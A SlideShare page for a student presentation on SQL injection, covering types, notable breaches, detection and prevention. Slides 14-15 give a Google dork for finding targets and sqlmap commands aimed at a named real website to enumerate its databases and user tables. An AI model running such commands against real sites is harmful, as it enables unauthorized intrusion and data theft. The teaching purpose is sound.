SlideShare a Scribd company logo

Sql Injection

Download as PPTX, PDF
Aju Thomas
Aju Thomas

Overiew on SQL Injection. Different Types of SQL injection. How it can be detected and methods to prevent SQL Injection. How it can be implemented using Kalii Linux commands

Engineering
1 of 17
SQL INJECTION AJU MATHEW THOMAS 1
What is SQL Injection • A technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. • Basic objective is to pull the database information existing behind a webserver that will contain information about the website like username,passwords, admin details , and other relevant information related to a website etc. • It’s an exploit that a hacker use to gather information from a database 2
Overview – Cont. • Hackers can use SQL injection to add,modify, and delete records in the database • Gives an adversary complete control over the web application database. • It can any affect any web application that uses an SQL database such as my SQL , Oracle , SQL server etc. • Considered as one of the most prevalent and most dangerous web application vulnerabilities. • It is also listed as one of the top ten web application vulnerabilities in OWASP Top Ten 3
4
Injection Mechanism • Injection mechanism are mainly of two types (i) First order injection (ii) Second order injection • First order injection  (i) Injection through user inputs (ii) Injection through cookies (iii) Injection through server variables. • First order injection  Processes the input and causes the attacker’s injected SQL query to execute • Second order injection  Stores the user input for future use and responds to the request. When attacker submits a second request , The application retrieves the stored input and processes it causing the attacker’s injected SQL query to execute 5
History of SQLI • SQL injection was first discovered in 1998 • Jeff Forristal was one of the first people to ever document SQL injection • Few Exploits recorded in the past: (1) CVE-2019-1010248 – Synetics GmBH I-doit 1.12 and earlier was affected by SQL injection. Impact was unauthenticated access to My SQL database. Component was a web login form. The attack vector is : Sending a malicious HTTP POST request. (2) CVE-2019-1010259 –Saltstack Salt 2018.3 ,2019.2 – An attacker could escalate privileges on My SQL server deployed by cloud server. It leads to RCE. 6
History of SQLI Attacks • SQLI attacks are predominant since its inception and there have been a lot of attacks that happened in the past due to SQLI which impacted a huge loss to many of the organizations. • Starbucks Attack Aug 2019 – A critical SQL injection vulnerability existed on a Starbucks enterprise database that may have exposed internal financial and accounting records. The vulnerability was discovered through a vulnerability discovery program run by Hackerone on the behalf of Starbucks. The vulnerability can give access to taxes, receipts, payroll data and all other information held on an exposed accounting database. 7
History of SQLI Attacks(Cont.) • Sony Music Attacks May 2011 - A group of hackers performed SQL injection attack techniques to expose sensitive user records on Sony Music Japan and also on Sony BMG Greece on May 21 2011. • There were two PHP pages that were vulnerable to SQL Injection on Sony Music Japan Site • Data leaked from the attack on Sony BMG Greece included username,real names ,and email addresses of users registered on the Sony Music.gr site. This attack appears to have used an automated SQL injection tool to find the flaw. • The database information that was published from Sony Music Japan did not contain names, passwords or other personally identifiable information. 8
History of SQLI Attacks(Cont.) • An SQL injection attack was used to steal the personal details of 156,959 customers from British telecommunications company TalkTalk's servers, exploiting a vulnerability in a legacy web portal 9
Types of SQL Injections • SQL injections typically fall under three categories (i) In-band SQLi(Classic) , Inferential SQLi(Blind) and Out of band SQLi. • In-band SQLi  Attacker uses same channel of communication to launch their attacks and to gather results. The two subvariants are : o Error based SQLi – Performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the databse oUnion based SQLi – uses UNION sql operator which fuses multiple select statements generated by the database to get a single HTTP Response 10
Types of SQL Injections • Blind SQLi  Used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. • The vulnerability page may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. • Out of band SQLi  Can use this attack only when certain features are enabled on the database server used by the web application.Out of band SQLi is performed when the attacker can’t use the same channel to launch attack and gather information or when a server is too slow or unstable for these actions to be performed. 11
Detection of SQL Injection • Detection is an important component of mitigating the risk of SQL injection attack. • A WAF (Web Application Firewall) can detect and block basic SQL injection attacks. • IDS(Both network and host-based) can be tuned to detect SQL injection attacks. • Network based IDSes can monitor all connections to your database server and can flag suspicious activity. • Hosted based IDS can monitor web server logs and alert when something strange happens. 12
Prevention of SQL Injection Attacks • Sanitize database inputs. Any input to the web application database should be considered untrustworthy and should be dealt accordingly. • Developers must follow the principle of white listing the input validation • Use ‘prepared’ statements with parameterized queries, and to escape all user supplied input. • Limit the account privileges of the database user. Also give the web application the minimum privileges it needs to run. • Stored procedures can also make SQLI a lot harder. 13
SQL injection Attacks using SQL MAP • SQL Map  An open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. • PHP ID vulnerability  PHP ID vulnerability in websites are more prone to SQL injection attacks. Search engines like google can index websites that can contain the following line “php?id=1” in the URL. Attackers can make use of this vulnerability to perform SQLI attacks • Type the following the line in google search  “inurl: php?id=1”. It will list out all URLs that contains the above phrase. • A website can checked for SQLI vulnerability by appending a ‘ symbol at the end of the URL. If the content changes then it indicates that it is prone to SQL injection attacks 14
Working of sqlmap • Open ‘sqlmap’ in Terminal and type the command “sqlmap –h to see the list of options which are available • Type the command  sqlmap –u http://www.pha.org.pk/sro_list.php?catid=1 –dbs • Here u  URL of the website • dbs  To list out all the available databases related to the website • To get the tables  sqlmap –u http://www.pha.org.pk/sro_list.php?catid=1 -D pha –tables • To get the columns  sqlmap –u http://www.pha.org.pk/sro_list.php?catid=1 –D pha –T cp_user --columns 15
Bibliography 1) https://portswigger.net/daily-swig/sql-injection-flaw-opened-doorway-to-starbucks- accounting-database 2) https://www.csoonline.com/article/3257429/what-is-sql-injection-how-sqli-attacks-work- and-how-to-prevent-them.html 3) https://www.eweek.com/blogs/security-watch/sony-woes-continue-with-sql-injection- attacks 4) CEH module V9 on SQL Injection 5) Hackersploit – SQL Injection https://www.youtube.com/watch?v=3ZFblGx5v94 6) https://www.vice.com/en_us/article/aekzez/the-history-of-sql-injection-the-hack-that-will- never-go-away 7) SQL Injection for Beginners - https://www.youtube.com/watch?v=oWHKIiRGjtQ 8) https://www.cvedetails.com/vulnerability-list/opsqli-1/sql-injection.html 9) www.sqlmap.org 10) https://www.imperva.com/learn/application-security/sql-injection-sqli 11) https://en.wikipedia.org/wiki/SQL_injection 16
THANK YOU 17

Recommended

Sql injection
Sql injectionSql injection
Sql injection
Mehul Boghra
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
Prateek Chauhan
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
Sina Manavi
 
Sql injection
Sql injectionSql injection
Sql injection
Hemendra Kumar
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
 
Sql injection
Sql injectionSql injection
Sql injection
Nitish Kumar
 
Sql injection
Sql injectionSql injection
Sql injection
Zidh
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
Eguardian Global Services
 

Recommended

Sql injection
Sql injectionSql injection
Sql injection
Mehul Boghra
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
Prateek Chauhan
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
Sina Manavi
 
Sql injection
Sql injectionSql injection
Sql injection
Hemendra Kumar
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
 
Sql injection
Sql injectionSql injection
Sql injection
Nitish Kumar
 
Sql injection
Sql injectionSql injection
Sql injection
Zidh
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
Eguardian Global Services
 
Sql injection
Sql injectionSql injection
Sql injection
Pallavi Biswas
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
ashish20012
 
SQL injection
SQL injectionSQL injection
SQL injection
Raj Parmar
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
Herman Duarte
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
Napendra Singh
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Asish Kumar Rath
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
Bernardo Damele A. G.
 
Sql injections
Sql injectionsSql injections
Sql injections
KK004
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
Bernardo Damele A. G.
 
SQL Injection attack
SQL Injection attackSQL Injection attack
SQL Injection attack
Rayudu Babu
 
Sql injection
Sql injectionSql injection
Sql injection
Manjushree Mashal
 
Sql injection
Sql injectionSql injection
Sql injection
Sasha-Leigh Garret
 
Sql injection
Sql injectionSql injection
Sql injection
Nuruzzaman Milon
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
Raghav Bisht
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Sandeep Kumbhar
 
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptxcgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
prasadGade6
 
SQL Injection Introduction and Prevention
SQL Injection Introduction and PreventionSQL Injection Introduction and Prevention
SQL Injection Introduction and Prevention
Mohammed Fazuluddin
 

More Related Content

What's hot

Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
ashish20012
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
Bernardo Damele A. G.
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
Bernardo Damele A. G.
 

What's hot (20)

Sql injection
Sql injectionSql injection
Sql injection
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
SQL injection
SQL injectionSQL injection
SQL injection
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
 
Sql injections
Sql injectionsSql injections
Sql injections
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
 
SQL Injection attack
SQL Injection attackSQL Injection attack
SQL Injection attack
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
 

Similar to Sql Injection

cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptxcgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
prasadGade6
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
 
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
Kaukau9
 

Similar to Sql Injection (20)

cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptxcgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
 
SQL Injection Introduction and Prevention
SQL Injection Introduction and PreventionSQL Injection Introduction and Prevention
SQL Injection Introduction and Prevention
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
IRJET - SQL Injection: Attack & Mitigation
IRJET - SQL Injection: Attack & MitigationIRJET - SQL Injection: Attack & Mitigation
IRJET - SQL Injection: Attack & Mitigation
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
SQL INJECTIONS.pptx
SQL INJECTIONS.pptxSQL INJECTIONS.pptx
SQL INJECTIONS.pptx
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
Sql Injection
Sql InjectionSql Injection
Sql Injection
 
csf_ppt.pptx
csf_ppt.pptxcsf_ppt.pptx
csf_ppt.pptx
 
Lessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackLessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! Hack
 
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxDBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptx
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Web security
Web securityWeb security
Web security
 
Ijcatr04041018
Ijcatr04041018Ijcatr04041018
Ijcatr04041018
 
SQL Injection: Unraveling the Threats
SQL Injection: Unraveling the ThreatsSQL Injection: Unraveling the Threats
SQL Injection: Unraveling the Threats
 
Jonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdf
 
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
 
Whatis SQL Injection.pptx
Whatis SQL Injection.pptxWhatis SQL Injection.pptx
Whatis SQL Injection.pptx
 
Codeinjection
CodeinjectionCodeinjection
Codeinjection
 

Recently uploaded

Filters for Electromagnetic Compatibility Applications
Filters for Electromagnetic Compatibility ApplicationsFilters for Electromagnetic Compatibility Applications
Filters for Electromagnetic Compatibility Applications
Mathias Magdowski
 
ALCOHOL PRODUCTION- Beer Brewing Process.pdf
ALCOHOL PRODUCTION- Beer Brewing Process.pdfALCOHOL PRODUCTION- Beer Brewing Process.pdf
ALCOHOL PRODUCTION- Beer Brewing Process.pdf
Madan Karki
 
Final DBMS Manual (2).pdf final lab manual
Final DBMS Manual (2).pdf final lab manualFinal DBMS Manual (2).pdf final lab manual
Final DBMS Manual (2).pdf final lab manual
BalamuruganV28
 
Insurance management system project report.pdf
Insurance management system project report.pdfInsurance management system project report.pdf
Insurance management system project report.pdf
Kamal Acharya
 
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Lovely Professional University
 
BURGER ORDERING SYSYTEM PROJECT REPORT..pdf
BURGER ORDERING SYSYTEM PROJECT REPORT..pdfBURGER ORDERING SYSYTEM PROJECT REPORT..pdf
BURGER ORDERING SYSYTEM PROJECT REPORT..pdf
Kamal Acharya
 
Online book store management system project.pdf
Online book store management system project.pdfOnline book store management system project.pdf
Online book store management system project.pdf
Kamal Acharya
 
Maher Othman Interior Design Portfolio..
Maher Othman Interior Design Portfolio..Maher Othman Interior Design Portfolio..
Maher Othman Interior Design Portfolio..
MaherOthman7
 

Recently uploaded (20)

Filters for Electromagnetic Compatibility Applications
Filters for Electromagnetic Compatibility ApplicationsFilters for Electromagnetic Compatibility Applications
Filters for Electromagnetic Compatibility Applications
 
ALCOHOL PRODUCTION- Beer Brewing Process.pdf
ALCOHOL PRODUCTION- Beer Brewing Process.pdfALCOHOL PRODUCTION- Beer Brewing Process.pdf
ALCOHOL PRODUCTION- Beer Brewing Process.pdf
 
analog-vs-digital-communication (concept of analog and digital).pptx
analog-vs-digital-communication (concept of analog and digital).pptxanalog-vs-digital-communication (concept of analog and digital).pptx
analog-vs-digital-communication (concept of analog and digital).pptx
 
Involute of a circle,Square, pentagon,HexagonInvolute_Engineering Drawing.pdf
Involute of a circle,Square, pentagon,HexagonInvolute_Engineering Drawing.pdfInvolute of a circle,Square, pentagon,HexagonInvolute_Engineering Drawing.pdf
Involute of a circle,Square, pentagon,HexagonInvolute_Engineering Drawing.pdf
 
5G and 6G refer to generations of mobile network technology, each representin...
5G and 6G refer to generations of mobile network technology, each representin...5G and 6G refer to generations of mobile network technology, each representin...
5G and 6G refer to generations of mobile network technology, each representin...
 
Interfacing Analog to Digital Data Converters ee3404.pdf
Interfacing Analog to Digital Data Converters ee3404.pdfInterfacing Analog to Digital Data Converters ee3404.pdf
Interfacing Analog to Digital Data Converters ee3404.pdf
 
Artificial Intelligence Bayesian Reasoning
Artificial Intelligence Bayesian ReasoningArtificial Intelligence Bayesian Reasoning
Artificial Intelligence Bayesian Reasoning
 
Lesson no16 application of Induction Generator in Wind.ppsx
Lesson no16 application of Induction Generator in Wind.ppsxLesson no16 application of Induction Generator in Wind.ppsx
Lesson no16 application of Induction Generator in Wind.ppsx
 
Final DBMS Manual (2).pdf final lab manual
Final DBMS Manual (2).pdf final lab manualFinal DBMS Manual (2).pdf final lab manual
Final DBMS Manual (2).pdf final lab manual
 
Insurance management system project report.pdf
Insurance management system project report.pdfInsurance management system project report.pdf
Insurance management system project report.pdf
 
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
 
Electrostatic field in a coaxial transmission line
Electrostatic field in a coaxial transmission lineElectrostatic field in a coaxial transmission line
Electrostatic field in a coaxial transmission line
 
BURGER ORDERING SYSYTEM PROJECT REPORT..pdf
BURGER ORDERING SYSYTEM PROJECT REPORT..pdfBURGER ORDERING SYSYTEM PROJECT REPORT..pdf
BURGER ORDERING SYSYTEM PROJECT REPORT..pdf
 
Fabrication Of Automatic Star Delta Starter Using Relay And GSM Module By Utk...
Fabrication Of Automatic Star Delta Starter Using Relay And GSM Module By Utk...Fabrication Of Automatic Star Delta Starter Using Relay And GSM Module By Utk...
Fabrication Of Automatic Star Delta Starter Using Relay And GSM Module By Utk...
 
Seismic Hazard Assessment Software in Python by Prof. Dr. Costas Sachpazis
Seismic Hazard Assessment Software in Python by Prof. Dr. Costas SachpazisSeismic Hazard Assessment Software in Python by Prof. Dr. Costas Sachpazis
Seismic Hazard Assessment Software in Python by Prof. Dr. Costas Sachpazis
 
Supermarket billing system project report..pdf
Supermarket billing system project report..pdfSupermarket billing system project report..pdf
Supermarket billing system project report..pdf
 
Linux Systems Programming: Semaphores, Shared Memory, and Message Queues
Linux Systems Programming: Semaphores, Shared Memory, and Message QueuesLinux Systems Programming: Semaphores, Shared Memory, and Message Queues
Linux Systems Programming: Semaphores, Shared Memory, and Message Queues
 
Online book store management system project.pdf
Online book store management system project.pdfOnline book store management system project.pdf
Online book store management system project.pdf
 
Maher Othman Interior Design Portfolio..
Maher Othman Interior Design Portfolio..Maher Othman Interior Design Portfolio..
Maher Othman Interior Design Portfolio..
 
EMPLOYEE MANAGEMENT SYSTEM FINAL presentation
EMPLOYEE MANAGEMENT SYSTEM FINAL presentationEMPLOYEE MANAGEMENT SYSTEM FINAL presentation
EMPLOYEE MANAGEMENT SYSTEM FINAL presentation
 

Sql Injection

  • 2. What is SQL Injection • A technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. • Basic objective is to pull the database information existing behind a webserver that will contain information about the website like username,passwords, admin details , and other relevant information related to a website etc. • It’s an exploit that a hacker use to gather information from a database 2
  • 3. Overview – Cont. • Hackers can use SQL injection to add,modify, and delete records in the database • Gives an adversary complete control over the web application database. • It can any affect any web application that uses an SQL database such as my SQL , Oracle , SQL server etc. • Considered as one of the most prevalent and most dangerous web application vulnerabilities. • It is also listed as one of the top ten web application vulnerabilities in OWASP Top Ten 3
  • 4. 4
  • 5. Injection Mechanism • Injection mechanism are mainly of two types (i) First order injection (ii) Second order injection • First order injection  (i) Injection through user inputs (ii) Injection through cookies (iii) Injection through server variables. • First order injection  Processes the input and causes the attacker’s injected SQL query to execute • Second order injection  Stores the user input for future use and responds to the request. When attacker submits a second request , The application retrieves the stored input and processes it causing the attacker’s injected SQL query to execute 5
  • 6. History of SQLI • SQL injection was first discovered in 1998 • Jeff Forristal was one of the first people to ever document SQL injection • Few Exploits recorded in the past: (1) CVE-2019-1010248 – Synetics GmBH I-doit 1.12 and earlier was affected by SQL injection. Impact was unauthenticated access to My SQL database. Component was a web login form. The attack vector is : Sending a malicious HTTP POST request. (2) CVE-2019-1010259 –Saltstack Salt 2018.3 ,2019.2 – An attacker could escalate privileges on My SQL server deployed by cloud server. It leads to RCE. 6
  • 7. History of SQLI Attacks • SQLI attacks are predominant since its inception and there have been a lot of attacks that happened in the past due to SQLI which impacted a huge loss to many of the organizations. • Starbucks Attack Aug 2019 – A critical SQL injection vulnerability existed on a Starbucks enterprise database that may have exposed internal financial and accounting records. The vulnerability was discovered through a vulnerability discovery program run by Hackerone on the behalf of Starbucks. The vulnerability can give access to taxes, receipts, payroll data and all other information held on an exposed accounting database. 7
  • 8. History of SQLI Attacks(Cont.) • Sony Music Attacks May 2011 - A group of hackers performed SQL injection attack techniques to expose sensitive user records on Sony Music Japan and also on Sony BMG Greece on May 21 2011. • There were two PHP pages that were vulnerable to SQL Injection on Sony Music Japan Site • Data leaked from the attack on Sony BMG Greece included username,real names ,and email addresses of users registered on the Sony Music.gr site. This attack appears to have used an automated SQL injection tool to find the flaw. • The database information that was published from Sony Music Japan did not contain names, passwords or other personally identifiable information. 8
  • 9. History of SQLI Attacks(Cont.) • An SQL injection attack was used to steal the personal details of 156,959 customers from British telecommunications company TalkTalk's servers, exploiting a vulnerability in a legacy web portal 9
  • 10. Types of SQL Injections • SQL injections typically fall under three categories (i) In-band SQLi(Classic) , Inferential SQLi(Blind) and Out of band SQLi. • In-band SQLi  Attacker uses same channel of communication to launch their attacks and to gather results. The two subvariants are : o Error based SQLi – Performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the databse oUnion based SQLi – uses UNION sql operator which fuses multiple select statements generated by the database to get a single HTTP Response 10
  • 11. Types of SQL Injections • Blind SQLi  Used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. • The vulnerability page may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. • Out of band SQLi  Can use this attack only when certain features are enabled on the database server used by the web application.Out of band SQLi is performed when the attacker can’t use the same channel to launch attack and gather information or when a server is too slow or unstable for these actions to be performed. 11
  • 12. Detection of SQL Injection • Detection is an important component of mitigating the risk of SQL injection attack. • A WAF (Web Application Firewall) can detect and block basic SQL injection attacks. • IDS(Both network and host-based) can be tuned to detect SQL injection attacks. • Network based IDSes can monitor all connections to your database server and can flag suspicious activity. • Hosted based IDS can monitor web server logs and alert when something strange happens. 12
  • 13. Prevention of SQL Injection Attacks • Sanitize database inputs. Any input to the web application database should be considered untrustworthy and should be dealt accordingly. • Developers must follow the principle of white listing the input validation • Use ‘prepared’ statements with parameterized queries, and to escape all user supplied input. • Limit the account privileges of the database user. Also give the web application the minimum privileges it needs to run. • Stored procedures can also make SQLI a lot harder. 13
  • 14. SQL injection Attacks using SQL MAP • SQL Map  An open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. • PHP ID vulnerability  PHP ID vulnerability in websites are more prone to SQL injection attacks. Search engines like google can index websites that can contain the following line “php?id=1” in the URL. Attackers can make use of this vulnerability to perform SQLI attacks • Type the following the line in google search  “inurl: php?id=1”. It will list out all URLs that contains the above phrase. • A website can checked for SQLI vulnerability by appending a ‘ symbol at the end of the URL. If the content changes then it indicates that it is prone to SQL injection attacks 14
  • 15. Working of sqlmap • Open ‘sqlmap’ in Terminal and type the command “sqlmap –h to see the list of options which are available • Type the command  sqlmap –u http://www.pha.org.pk/sro_list.php?catid=1 –dbs • Here u  URL of the website • dbs  To list out all the available databases related to the website • To get the tables  sqlmap –u http://www.pha.org.pk/sro_list.php?catid=1 -D pha –tables • To get the columns  sqlmap –u http://www.pha.org.pk/sro_list.php?catid=1 –D pha –T cp_user --columns 15
  • 16. Bibliography 1) https://portswigger.net/daily-swig/sql-injection-flaw-opened-doorway-to-starbucks- accounting-database 2) https://www.csoonline.com/article/3257429/what-is-sql-injection-how-sqli-attacks-work- and-how-to-prevent-them.html 3) https://www.eweek.com/blogs/security-watch/sony-woes-continue-with-sql-injection- attacks 4) CEH module V9 on SQL Injection 5) Hackersploit – SQL Injection https://www.youtube.com/watch?v=3ZFblGx5v94 6) https://www.vice.com/en_us/article/aekzez/the-history-of-sql-injection-the-hack-that-will- never-go-away 7) SQL Injection for Beginners - https://www.youtube.com/watch?v=oWHKIiRGjtQ 8) https://www.cvedetails.com/vulnerability-list/opsqli-1/sql-injection.html 9) www.sqlmap.org 10) https://www.imperva.com/learn/application-security/sql-injection-sqli 11) https://en.wikipedia.org/wiki/SQL_injection 16